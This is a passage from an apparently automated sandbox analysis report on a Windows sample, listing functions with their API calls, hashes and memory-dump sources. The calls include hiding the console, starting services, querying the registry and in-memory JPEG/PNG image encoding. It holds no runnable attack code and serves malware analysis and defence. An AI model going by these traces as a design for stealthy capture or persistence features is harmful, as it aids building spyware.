                                                                                • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                Function 0079B881 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B8AE
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B8D3
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00783D5A,00465324), ref: 0079B8E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 3919263394-0
                                                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                • Instruction ID: d4d5e8a026202857eddebc3c87a9897228275147c1553e96471a877526412c34
                                                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                • Instruction Fuzzy Hash: EDF096B5245309BFE6112B24FC89FBF375CDB866B6F100679F902A2192DA698C059171
                                                                                Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem
                                                                                • String ID:
                                                                                • API String ID: 4116985748-0
                                                                                • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                Function 0079C117 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • AllocConsole.KERNEL32 ref: 0079C120
                                                                                • GetConsoleWindow.KERNEL32 ref: 0079C126
                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0079C139
                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0079C15E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$Window$AllocOutputShow
                                                                                • String ID:
                                                                                • API String ID: 4067487056-0
                                                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction ID: adc24bd4d6064eadc80f50d7e767207e937e7c11fed4f8c29b11510eb3190490
                                                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                • Instruction Fuzzy Hash: 5C01F4B1980304FFDA10FBF19D4FF9D77ACAB14701F50042AB644E7193E6ADD6444699
                                                                                Function 00799E2B Relevance: 6.0, APIs: 4, Instructions: 39serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,00799A81,00000000,00000000), ref: 00799E34
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00799A81,00000000,00000000), ref: 00799E49
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00799A81,00000000,00000000), ref: 00799E56
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00799A81,00000000,00000000), ref: 00799E61
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Service$Open$CloseHandleManagerStart
                                                                                • String ID:
                                                                                • API String ID: 2553746010-0
                                                                                • Opcode ID: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                • Instruction ID: 5ffacbdec20259a9da46d44c7e58906cadef66af947c381caeef7b67c91fca39
                                                                                • Opcode Fuzzy Hash: 413273253f7cbae0f6bd9debfc52a3b8d95171ad4a984208ec06c12d82ce07c5
                                                                                • Instruction Fuzzy Hash: 50F08972545318BFE611AB34BC88EBF2AACDF85BA2B000439F50192191CB68CC06D675
                                                                                Function 00784D18 Relevance: 6.0, APIs: 4, Instructions: 35synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,00784AA6,00000001,?,?,00000000,00475B70,00781A5A), ref: 00784D54
                                                                                • SetEvent.KERNEL32(?,?,?,00000000,00475B70,00781A5A), ref: 00784D60
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,00781A5A), ref: 00784D6B
                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,00781A5A), ref: 00784D74
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                • String ID:
                                                                                • API String ID: 2993684571-0
                                                                                • Opcode ID: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                • Instruction ID: fab97a5fd9f72ef2a2f11505d6e8a8e0dbbe75ee3def591f8a54871d8b24b0a0
                                                                                • Opcode Fuzzy Hash: 68b50adcbc3edbb9d4c8525224eb9d153fc5f31cab3a74662374d300908f4771
                                                                                • Instruction Fuzzy Hash: 23F0E075944710BFDB2137749D0FA7A7F98EB01311F1009AAF942836B2D56C88908766
                                                                                Function 0079C0D6 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 0079C0E0
                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?), ref: 0079C0ED
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0079C0FA
                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0079C10D
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                • String ID:
                                                                                • API String ID: 3024135584-0
                                                                                • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                • Instruction ID: bb6be0cd1b17b42927068b99f002f17a129d98c665d9e8bfb5e420f31393757d
                                                                                • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                • Instruction Fuzzy Hash: F9E04F62204348BBD31437F5BC8ECAB3B6CE784613B101535F61290393EA7488448A75
                                                                                Function 0079A8A6 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(0046BC64,0000000A,00000000), ref: 0079A8B7
                                                                                • LoadResource.KERNEL32(00000000,?,?,0078E3EA,00000000), ref: 0079A8CB
                                                                                • LockResource.KERNEL32(00000000,?,?,0078E3EA,00000000), ref: 0079A8D2
                                                                                • SizeofResource.KERNEL32(00000000,?,?,0078E3EA,00000000), ref: 0079A8E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                • Instruction ID: 532c6c311b4ddb67321f8d2502c568c30474b7ebe285ccfba0461b0f0728a59b
                                                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                • Instruction Fuzzy Hash: 6CE09A7A604710ABCB211BA5BC8CD477E39E786B637144036F90592331DA359851DA59
                                                                                Function 007BA4B2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 266COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __aulldvrm
                                                                                • String ID: +$-
                                                                                • API String ID: 1302938615-2137968064
                                                                                • Opcode ID: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                                                • Instruction ID: 031c9f7656bfe189ecc94f3b98d22bc5a0258bcb5dbf98bdd7ba637d3823a848
                                                                                • Opcode Fuzzy Hash: bb05039bd10173984d8ac256ef46a28b781231ebc573ca9b653a1b6ddea24a85
                                                                                • Instruction Fuzzy Hash: 4791E770D04249BFCF20EF68C8447EDBBB1EF55324F18825AE865E7291E63C9A45CB52
                                                                                Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorHandling__start
                                                                                • String ID: pow
                                                                                • API String ID: 3213639722-2276729525
                                                                                • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountEventTick
                                                                                • String ID: >G
                                                                                • API String ID: 180926312-1296849874
                                                                                • Opcode ID: 12cd073fe8d5e9797a5389cba3b852969d6d8c39121b8871935ed4c701e0cacf
                                                                                • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                • Opcode Fuzzy Hash: 12cd073fe8d5e9797a5389cba3b852969d6d8c39121b8871935ed4c701e0cacf
                                                                                • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $fD
                                                                                • API String ID: 1807457897-3092946448
                                                                                • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                Function 007B7CE7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 007B7D1A
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 007B7DD3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 3480331319-1018135373
                                                                                • Opcode ID: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                • Instruction ID: df05c1bb63d14565961804507e97eeb4fc7bd770118659a2236586ea1829dbdd
                                                                                • Opcode Fuzzy Hash: 47e26074ed3df67517ea761fc7c27dd00097028ab85dfbf9f1f14e41715e449f
                                                                                • Instruction Fuzzy Hash: C241E430A04209EBCF18DF68C884BEEBBB5BF84364F1481A5E9155B392D739DA01CB90
                                                                                Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1291196975-3785015651
                                                                                • Opcode ID: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                                                                                • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                • Opcode Fuzzy Hash: 8f3b30371828e1907736ebf26ac10b00a12ebc6a0bae61ebf375912b50c4f4ef
                                                                                • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                Function 00783C77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00783C91
                                                                                  • Part of subcall function 0079AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00783CA7), ref: 0079ADC6
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32( =x$SF,?,?,00783D20,00465324), ref: 00797933
                                                                                  • Part of subcall function 0079791D: CloseHandle.KERNEL32(?,?,?,00783D20,00465324), ref: 0079793C
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00783D63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                • String ID: 8>G
                                                                                • API String ID: 368326130-2084872820
                                                                                • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                • Instruction ID: e980eb8f3227b4c715b4c3367afeac5c899972c62b37df3d5d0785a01df30c61
                                                                                • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                                • Instruction Fuzzy Hash: 69312131A84218DACF18FB74DC9EEED7775AF80701F404069F506A7193EE685A4ACB91
                                                                                Function 00797E43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00797E6F
                                                                                • SHCreateMemStream.SHLWAPI(00000000), ref: 00797EBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateStream
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 1369699375-3785015651
                                                                                • Opcode ID: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                                                • Instruction ID: be20991b3e44c19d5c50f858b07492c5af88ac2ab3e6070ccfba4cdedc1eb8c1
                                                                                • Opcode Fuzzy Hash: c54b99025069d5ee8ebf63b240a23f69e2b107a8cc8e6297c40287d8f8f82ecf
                                                                                • Instruction Fuzzy Hash: 7F314B71514200AFC711AF64C888D6FBBE9FF8A700F00495DF945D7252DB799A09CBA2
                                                                                Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 0-711371036
                                                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                Function 007D0B45 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetACP.KERNEL32(?,20001004,?,00000002), ref: 007D0C20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ACP$OCP
                                                                                • API String ID: 0-711371036
                                                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction ID: d4136152631685677459b98a467680a6a1e4efe645c5130b317fee9074bee809
                                                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                • Instruction Fuzzy Hash: 652106A2A48104A6E7348E64DD01BDB73B6EB54B69F569527E909D7300F73ADD00C3E4
                                                                                Function 0078B0BF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 007B3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B378B
                                                                                  • Part of subcall function 007B3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B37C8
                                                                                  • Part of subcall function 007B3B0C: __onexit.LIBCMT ref: 007B3B12
                                                                                • __Init_thread_footer.LIBCMT ref: 0078B10E
                                                                                  • Part of subcall function 007B3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 007B3740
                                                                                  • Part of subcall function 007B3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 007B3773
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                • String ID: ,]G$0]G
                                                                                • API String ID: 2974294136-589576501
                                                                                • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                • Instruction ID: 4cd5f0721b34d023b7ddc23c79f17431d86dd8faebab4be895c90b3f06391489
                                                                                • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                • Instruction Fuzzy Hash: AE218531A4010CDACB14FBB4D89EEEEB735AF54311F50402AE5056B1A3EF2C6E4AC795
                                                                                Function 0078B951 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0079277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0079279E
                                                                                  • Part of subcall function 0079277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 007927BB
                                                                                  • Part of subcall function 0079277A: RegCloseKey.ADVAPI32(?), ref: 007927C6
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0078B9D3
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 0078B9E0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                • String ID: TUF
                                                                                • API String ID: 1133728706-3431404234
                                                                                • Opcode ID: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                                                • Instruction ID: 14d2ca01cbfb990e46c4163e644ffc152c40abcae2ac3db581971bd41978a025
                                                                                • Opcode Fuzzy Hash: d94b965c273a091329a6f5a73edda4c14bb16021ab9e8e668cdf3b753880c9a9
                                                                                • Instruction Fuzzy Hash: C1216231A80209EACB14F7B4DD5FDEE77696F14701F500165B902A7283FF69990AC7A2
                                                                                Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                  • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                  • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                  • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                • String ID: image/png
                                                                                • API String ID: 1291196975-2966254431
                                                                                • Opcode ID: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
                                                                                • Instruction ID: e3b7944e5392015f30009faa46d0af48502643625c308f0969f1fef2cb3c76d4
                                                                                • Opcode Fuzzy Hash: 3eb8dd80f54a72a5a0a9ed13ccec69a705e73992219fab643a786ff0acabb055
